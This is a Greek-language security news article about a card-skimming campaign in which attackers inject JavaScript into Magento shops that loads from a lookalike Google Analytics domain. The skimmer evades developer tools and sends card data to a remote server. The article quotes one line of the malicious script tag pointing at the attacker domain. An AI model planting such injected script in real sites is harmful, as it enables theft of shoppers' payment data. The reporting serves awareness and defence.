ΑρχικήsecurityΚακόβουλα Google domains χρησιμοποιούνται σε card skimmer επιθέσεις

Κακόβουλα Google domains χρησιμοποιούνται σε card skimmer επιθέσεις

skimmer Οι εγκληματίες του κυβερνοχώρου βρήκαν ένα νέο τρόπο να κλέψουν χρήματα από χρήστες, που κάνουν online συναλλαγές. Οι hackers χρησιμοποιούν ψεύτικα domains, τα οποία υποτίθεται ότι είναι της Google, και οδηγούν τους χρήστες σε παραβιασμένα sites. Βλέποντας το domain, οι χρήστες νομίζουν ότι το site είναι ασφαλές. Κάποιοι ερευνητές από την εταιρεία Sucuri ήρθαν σε επικοινωνία με έναν ιδιοκτήτη ενός Magento website, και ενημερώθηκαν ότι ένα domain είχε μολυνθεί με ένα skimmer πιστωτικών καρτών. Το skimmer χρησιμοποιεί κώδικα JavaScript, που περιέχει έναν σύνδεσμο με την κακόβουλη διεύθυνση google-analytîcs [.] Com.

Ακολουθεί ένα παράδειγμα του κακόβουλου κώδικα:

<script type = “text / javascript” src = “//google-analytîcs.com/www.[redacted]/3f5cf4657d5d9.js”> </ script>

Οι ερευνητές είπαν ότι οι hackers χρησιμοποιούν αξιόπιστα ονόματα, όπως η Google, και έτσι οι επισκέπτες νομίζουν ότι τα sites είναι ασφαλή. Δεν προσέχουν, όμως, ότι υπάρχει μια διαφοροποίηση στο domain, που υποδεικνύει ότι πρόκειται για κακόβουλο site.

Οι ερευνητές ανακάλυψαν ότι το συγκεκριμένο skimmer είναι παρόμοιο με άλλα που κυκλοφορούν και αποθηκεύει δεδομένα, που εισάγονται, καθώς και drop-down menu επιλογές.

Ωστόσο, το skimmer ελέγχει αν χρησιμοποιούνται developer tools είτε στο Google Chrome είτε στο Mozilla Firefox. Στην περίπτωση που χρησιμοποιούνται, δεν θα επιχειρήσει να κλέψει οποιαδήποτε πληροφορία για να αποφύγει την ανίχνευση.

Αν δεν εντοπιστούν developer tools, κλέβει πληροφορίες και τις στέλνει σε έναν απομακρυσμένο server.

Τα card skimmers εγκαθίστανται μέσω ευάλωτων sites ηλεκτρονικού εμπορίου και αποτελούν ένα σοβαρό και συχνό πρόβλημα. Τον Ιούλιο, η εταιρεία λογισμικού RiskIQ δήλωσε ότι μια πρόσφατη εκστρατεία κατάφερε να μολύνει πάνω από 17.000 websites με card-skimming malware μέσα σε λίγους μόνο μήνες.

Οι χρήστες του Magento, όπως και του WordPress και του Drupal πρέπει να ενημερώνουν συνεχώς τα λογισμικά τους. Τα Magento domains αποτελούν στόχο των hackers, που προσπαθούν να κλέψουν οικονομικά δεδομένα. Μια έκθεση έδειξε ότι το 2018, το 83% των Magento websites βρέθηκαν να είναι ευάλωτα στα card skimmers.

Absenta Mia
Absenta Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greater achievement

Εγγραφή στο Newsletter

* indicates required

FOLLOW US

LIVE NEWS